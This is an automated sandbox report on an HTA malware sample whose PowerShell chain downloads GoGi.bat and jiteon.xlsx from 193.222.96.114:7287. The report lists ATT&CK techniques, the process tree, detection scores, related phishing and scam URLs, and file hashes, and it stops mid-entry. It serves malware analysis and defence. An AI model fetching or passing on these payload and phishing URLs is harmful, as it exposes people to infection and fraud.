Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
MITRE ATT&CK Matrix (the number in parentheses is the count of matched behaviours for that technique; techniques without a count were not observed)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Scripting (1), Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Command and Scripting Interpreter (112), PowerShell (1), At, Cron, Launchd, Scheduled Task
Persistence: Scripting (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Masquerading (11), Virtualization/Sandbox Evasion (31), Process Injection (11), Obfuscated Files or Information (1), DLL Side-Loading (1), Steganography
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery (11), Process Discovery (1), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (23)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Email Collection (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Encrypted Channel (1), Non-Standard Port (11), Ingress Tool Transfer (1), Non-Application Layer Protocol (1), Application Layer Protocol (2), Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
Behavior Graph ID: 1429074, Sample: hta.hta, Startdate: 20/04/2024, Architecture: WINDOWS, Score: 100
Top-level signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures

Process tree as rendered in the behavior graph (signatures and network or file activity in parentheses):
mshta.exe (Suspicious powershell command line found; Very long command line found)
  powershell.exe (Suspicious powershell command line found; connects to 193.222.96.114, ports 49730, 49731, 7287, SWISSCOM Swisscom Switzerland Ltd CH, Germany; drops C:\Users\user\AppData\Roaming\GoGi.bat, DOS)
    cmd.exe (Very long command line found)
      cmd.exe (Very long command line found)
        powershell.exe (Suspicious powershell command line found)
          powershell.exe
        conhost.exe
        cmd.exe
      conhost.exe
    EXCEL.EXE (connects to part-0013.t-0009.t-msedge.net 13.107.246.41, port 443, local ports 49755, 49756, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States)
      splwow64.exe
    conhost.exe
svchost.exe (connects to 127.0.0.1)
Source | Detection | Scanner | Label
hta.hta | 40% | Virustotal |
hta.hta | 39% | ReversingLabs | Document-HTML.Trojan.Valyria
hta.hta | 100% | Avira | VBS/Dldr.Agent.VPLT

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
bg.microsoft.map.fastly.net | 0% | Virustotal |
part-0013.t-0009.t-msedge.net | 0% | Virustotal |

Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
http://193.222.96. | 0% | Virustotal |
http://193.222.96.114 | 11% | Virustotal |
http://193.222.96.114:7287/jiteon.xlsx | 15% | Virustotal |
http://193.222.9 | 0% | Virustotal |
http://193.222.96.114:7287/GoGi.bat | 12% | Virustotal |
http://193.222.96 | 0% | Virustotal |
http://193.22 | 0% | Virustotal |
http://193.222. | 0% | Virustotal |
http://193.222 | 0% | Virustotal |
http://193.222.96.1 | 0% | Virustotal |
http://193.222.96.11 | 7% | Virustotal |
http://193.2 | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
part-0013.t-0009.t-msedge.net | 13.107.246.41 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://193.222.96.114:7287/jiteon.xlsx | false | | unknown
http://193.222.96.114:7287/GoGi.bat | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://193.222. | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | low
https://contoso.com/License | powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://193.222.96.114:7287/GoGi. | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://crl.ver) | svchost.exe, 0000000B.00000002.2966470735.000002AB2DCC0000.00000004.00000020.00020000.00000000.sdmp | false | | low
https://g.live.com/odclientsettings/ProdV2.C: | edb.log.11.dr, qmgr.db.11.dr | false | | high
http://193.222.96.114:72 | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://193.222.96. | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | low
https://aka.ms/pscore6LR | powershell.exe, 0000000A.00000002.1786540892.0000000004C87000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://193.222.96.114 | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://193.222.96.114:728 | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://193.222.96.114:7287/GoGi.ba | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://g.live.com/odclientsettings/Prod.C: | edb.log.11.dr, qmgr.db.11.dr | false | | high
http://193.222.9 | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | low
http://193.22 | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | low
http://193.222.96.114:7287/Go | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://g.live.com/odclientsettings/ProdV2 | edb.log.11.dr, qmgr.db.11.dr | false | | high
http://193.222.96.114:7287/G | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://193.222.96.114:7287/GoGi | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://193.222.96 | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | low
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr | false | | high
http://193.222.96.1 | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://193.222.96.114:7287 | powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.0000000005567000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.1760006008.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1786540892.0000000004CA6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://193.222.96.114: | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.0000000005567000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://193.222.96.114:7287/GoGi.b | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://193.2 | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | low
http://193.222 | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | low
http://193.222.96.114:7287/ | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1760006008.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1786540892.0000000004CC3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://193.222.96.114:7 | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://193.222.96.11 | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr | false | | high
http://193.222.96.114:7287/GoG | powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.246.41 | part-0013.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
193.222.96.114 | unknown | Germany | 3303 | SWISSCOMSwisscomSwitzerlandLtdCH | false
                                                      IP
                                                      127.0.0.1
                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1429074
                                                      Start date and time:2024-04-20 16:04:06 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 5m 54s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:18
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:hta.hta
                                                      Detection:MAL
                                                      Classification:mal100.troj.winHTA@22/17@0/3
                                                      EGA Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 34
                                                      • Number of non-executed functions: 3
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .hta
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 52.109.8.89, 52.113.194.132, 23.44.104.130, 52.109.8.36, 199.232.214.172, 20.189.173.6
                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, cus-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-cus-buff-azsc-000.centralus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, wu-bg-shim.trafficmanager.net, cus-azsc-000.roaming.officeapps.live.com, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, s-0005.s-msedge.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net,
                                                      • Execution Graph export aborted for target powershell.exe, PID 7332 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 7828 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
16:05:03 | API Interceptor | 26x Sleep call for process: powershell.exe modified
16:05:07 | API Interceptor | 2x Sleep call for process: svchost.exe modified
16:06:10 | API Interceptor | 630x Sleep call for process: splwow64.exe modified
Match: 13.107.246.41
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
http://www.surveymonkey.com/tr/v1/te/PUEIZHbYTJGrZEIkVMWlCoicdktJQxDgUh5D5mhe1V5RrTmuIdynx7PnFHXRUx9slMgQjvZdyUWqhr_2Bl49oNXjy3TOleTjKMKR6WbsGcrstlT2syBMlSkW7U5aKlKcBD9NFqJqrxGyODSWJJr6_2BMbXsKkDA_2F0ep4iw23xw6huuM_3D | Get hash | malicious | Unknown | Browse | www.eand.com/en/index.html
02-11-2024 MVP.html | Get hash | malicious | Unknown | Browse | www.mvphealthcare.com/
02-11-2024 MVP.html | Get hash | malicious | Unknown | Browse | www.mvphealthcare.com/
http://y84x.mjt.lu/lnk/CAAABPdweCoAAAAAAAAAAAVG8MwAAAA6pnMAAAAAAAvpOQBlhIO4-ImJ1UImRBC5CNVIkLSaswAL-7Q/2/r-vXj7XjX0azsD7QNKNH-A/aHR0cHM6Ly9hcHBjZW50ZXIubXMvaW52aXRhdGlvbnMvb3JnL2IxNjM2ZDYzMTE0YTM0MjBkYWFmNTg4YTE5N2Y0N2MxNGY4ZDViNWMyM2ZjM2RhYTgxMWM0ODgwOWM1ZTZkNjQ | Get hash | malicious | Unknown | Browse | appcenter.ms/
http://url7816.acetaxi.com/ls/click?upn=k9eqZnPBEZmPVPka3LxS61O1ksdCJOgznvtiwccqzi2-2BneqvfCXEJ-2FQj-2BZo7snmCwDunBahf2LYhfs7qQp7-2F23xLStq-2BkxJ70xqVvyXzkWM-3D8Cie_z5TGfmB4A65PPE2hDgRdrx6OZsZ3AmrJLHJ0M9ePWeHP5QDTWsAVp117uXam9dNn-2BGSxHeP-2BInRF-2Bgy2v-2FXBPODjmLss6NRV2RYsUYD7um77hgLl0ET9pPGTHF-2BQ1m6-2Fw7-2B-2B9DJOpakZj874YLC8uUep0F7rZMDlM46gmHmQqqAeCV477M0h2b07T2IcXu0hzUcKftN0UG2jhPq8qo00cQl0gvOLl-2BjChyaOdLpENao-3D | Get hash | malicious | Unknown | Browse | twiliosolutions.azurefd.net/

Match: 193.222.96.114
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
GoGi.bat | Get hash | malicious | Unknown | Browse |
Match: bg.microsoft.map.fastly.net
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
GoGi.bat | Get hash | malicious | Unknown | Browse | 199.232.210.172
fP4kybhBWi.exe | Get hash | malicious | Quasar | Browse | 199.232.214.172
ShippingOrder_ GSHS2400052.exe | Get hash | malicious | AgentTesla, PureLog Stealer, zgRAT | Browse | 199.232.210.172
https://bj8lt4fm8evwyl.pages.dev/smart89/ | Get hash | malicious | Unknown | Browse | 199.232.210.172
https://28.104-168-101-28.cprapid.com/Pay-PaI/ | Get hash | malicious | PayPal Phisher | Browse | 199.232.214.172
https://sharma-sanjana2108.github.io/Microsoft/ | Get hash | malicious | Unknown | Browse | 199.232.210.172
https://pusha1qsn.z13.web.core.windows.net/ | Get hash | malicious | TechSupportScam | Browse | 199.232.214.172
https://support1-4ec.pages.dev/ | Get hash | malicious | TechSupportScam | Browse | 199.232.210.172
https://support-bxv.pages.dev/ | Get hash | malicious | TechSupportScam | Browse | 199.232.214.172
https://k19gdtyrshgcjghldjk.z13.web.core.windows.net/Win/index.html?phone=null | Get hash | malicious | TechSupportScam | Browse | 199.232.210.172

Match: part-0013.t-0009.t-msedge.net
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
https://sharma-sanjana2108.github.io/Microsoft/ | Get hash | malicious | Unknown | Browse | 13.107.246.41
https://19apmic17.z13.web.core.windows.net/ | Get hash | malicious | TechSupportScam | Browse | 13.107.246.41
https://19apmic11.z13.web.core.windows.net/ | Get hash | malicious | TechSupportScam | Browse | 13.107.213.41
https://estgirls-my.sharepoint.com/:b:/g/personal/s7958766_estg_moe_gov_sa/EeCN0MAR0F5NufUZkT2Q-mcBn4v13Ov8FQ0oi798Dgtayg?e=zTKNmK | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.41
FFE Order details - Cincy v41720.xlsx | Get hash | malicious | Unknown | Browse | 13.107.246.41
https://keenetownhall-my.sharepoint.com/:b:/g/personal/amanda_keenetownhall_org/ESKbqbSIMj5ElsbdsfaEg7oBgkFm5H_JqS97uaySzVhJDQ?e=KMMz4y | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.41
https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22) | Get hash | malicious | HtmlDropper, HTMLPhisher | Browse | 13.107.246.41
Encrypted_PaymentAdvice_Reference.html | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.41
https://url.us.m.mimecastprotect.com/s/kCCtC5yEz0tWp5ANrfz_KPV?domain=paplastics365-my.sharepoint.com | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.41
https://edbullardcompany-my.sharepoint.com/:f:/g/personal/eric_rosario_bullard_com/EoLKvcaqSE1Go3fA5to5CQABtxAftKTD0ktrakp7rbi4Xg?e=Mvbf0D | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.41
Match: SWISSCOMSwisscomSwitzerlandLtdCH
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
hta.hta | Get hash | malicious | Unknown | Browse | 193.222.96.128
GoGi.bat | Get hash | malicious | Unknown | Browse | 193.222.96.114
15.bat | Get hash | malicious | Unknown | Browse | 193.222.96.128
ShippingOrder_ GSHS2400052.exe | Get hash | malicious | AgentTesla, PureLog Stealer, zgRAT | Browse | 193.222.96.147
Encrypted_PaymentAdvice_Reference.html | Get hash | malicious | HTMLPhisher | Browse | 193.222.96.119
z42MNA2024000000041-KWINTMADI-11310Y_K.exe | Get hash | malicious | GuLoader, Remcos | Browse | 193.222.96.21
z14Novospedidosdecompra_Profil_4903.exe | Get hash | malicious | GuLoader, Remcos | Browse | 193.222.96.21
UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe | Get hash | malicious | GuLoader, Remcos | Browse | 193.222.96.21
wFtZih4nN9.elf | Get hash | malicious | Mirai | Browse | 85.7.65.219
dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbs | Get hash | malicious | GuLoader, Remcos | Browse | 193.222.96.11

Match: MICROSOFT-CORP-MSN-AS-BLOCKUS
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
jNeaezBuo8.exe | Get hash | malicious | Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | Browse | 20.189.173.21
74fa486WVX.exe | Get hash | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | Browse | 13.89.179.12
https://sharma-sanjana2108.github.io/Microsoft/ | Get hash | malicious | Unknown | Browse | 13.107.213.41
https://19apmic17.z13.web.core.windows.net/ | Get hash | malicious | TechSupportScam | Browse | 13.107.246.51
https://19apmic11.z13.web.core.windows.net/ | Get hash | malicious | TechSupportScam | Browse | 13.107.213.41
https://phrmacompliance-my.sharepoint.com/:b:/g/personal/jjessen_pharma-compliance_net/EQZ_BD-NnrNInOz6x58pqAABLCZuVkxMtPHJVQGDMcKQDA?e=as678X | Get hash | malicious | HtmlDropper, HTMLPhisher | Browse | 13.107.136.10
https://estgirls-my.sharepoint.com/:b:/g/personal/s7958766_estg_moe_gov_sa/EeCN0MAR0F5NufUZkT2Q-mcBn4v13Ov8FQ0oi798Dgtayg?e=zTKNmK | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.70
https://estgirls-my.sharepoint.com/:b:/g/personal/s7958766_estg_moe_gov_sa/EeCN0MAR0F5NufUZkT2Q-mcBn4v13Ov8FQ0oi798Dgtayg?e=zTKNmK | Get hash | malicious | HTMLPhisher | Browse | 13.107.213.41
FFE Order details - Cincy v41720.xlsx | Get hash | malicious | Unknown | Browse | 13.107.246.69
FFE Order details - Cincy v41720.xlsx | Get hash | malicious | Unknown | Browse | 13.107.246.40
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
2M1NS61GG8.exe | Get hash | malicious | LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRAT | Browse | 13.107.246.41
RrHuyQ4GzG.exe | Get hash | malicious | LummaC | Browse | 13.107.246.41
SecuriteInfo.com.Win32.Malware-gen.6467.28521.exe | Get hash | malicious | Unknown | Browse | 13.107.246.41
SecuriteInfo.com.Win32.Malware-gen.6467.28521.exe | Get hash | malicious | Unknown | Browse | 13.107.246.41
FFE Order details - Cincy v41720.xlsx | Get hash | malicious | Unknown | Browse | 13.107.246.41
z47Danfe-Pedido17042024.msi | Get hash | malicious | MicroClip | Browse | 13.107.246.41
SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe | Get hash | malicious | Remcos, DBatLoader | Browse | 13.107.246.41
Gantt_Excel_Pro_Daily_Free1.xlsm | Get hash | malicious | Unknown | Browse | 13.107.246.41
s2dwlCsA95.exe | Get hash | malicious | RisePro Stealer | Browse | 13.107.246.41
SecuriteInfo.com.Trojan.PWS.Steam.37210.2413.24955.exe | Get hash | malicious | LummaC | Browse | 13.107.246.41
                                                        No context
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):1.3073489056561383
                                                        Encrypted:false
                                                        SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrg:KooCEYhgYEL0In
                                                        MD5:233F5B68FD7D09F8D87F9EEC01D525E7
                                                        SHA1:D70DF9E820EFED7923B02777B81D73D6BCCD8A05
                                                        SHA-256:865B036F9A4D37C2AA6D7F48C4870C0426B05CDA362B5527CF99C1AE86BAFF28
                                                        SHA-512:9C529506D7A8C2C52B54C6E90A74BA98DEA0B5B915C1DC1DE051BD2862BBFDE711615D4BD579AE4AF633E15B10D32CA3F7B60D7D91E4DC7D1F32ADE133410EA2
                                                        Malicious:false
                                                        Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x689d4e29, page size 16384, DirtyShutdown, Windows version 10.0
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):0.4221069424258232
                                                        Encrypted:false
                                                        SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                                        MD5:ABD599269C5CD0CFB8D98E181EFB504E
                                                        SHA1:9EA8D4A7AE4234FE3579FA3D85FBC13AE57383C0
                                                        SHA-256:3AA16BBD0BCB2DAB2F9A478DA4B80DF8454EBC99780A6D78AEE966F8F61948C2
